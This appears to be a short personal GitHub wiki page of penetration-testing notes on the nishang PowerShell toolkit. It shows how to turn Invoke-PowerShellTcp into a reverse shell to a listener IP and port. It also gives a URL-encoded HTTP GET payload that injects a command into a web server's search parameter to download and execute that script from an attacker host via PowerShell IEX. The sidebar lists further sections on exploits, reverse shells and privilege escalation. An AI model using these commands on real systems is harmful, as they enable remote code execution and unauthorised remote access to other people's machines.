Skip to content

nishang_PS

lethanhtung01011980 edited this page Mar 24, 2020 · 11 revisions

Goal

Sample Usage

Invoke-PowerShellTcp

  • cd nishang/Shells
  • https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
  • Add at the end of Invoke-PowerShellTcp.ps1: Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 5678
  • GET /?search=%00{.exec|C%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.Webclient).downloadString('http%3a//10.10.14.15/Invoke-PowerShellTcp.ps1').} HTTP/1.1
  • URL Encoding : to %3a and a space to +

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally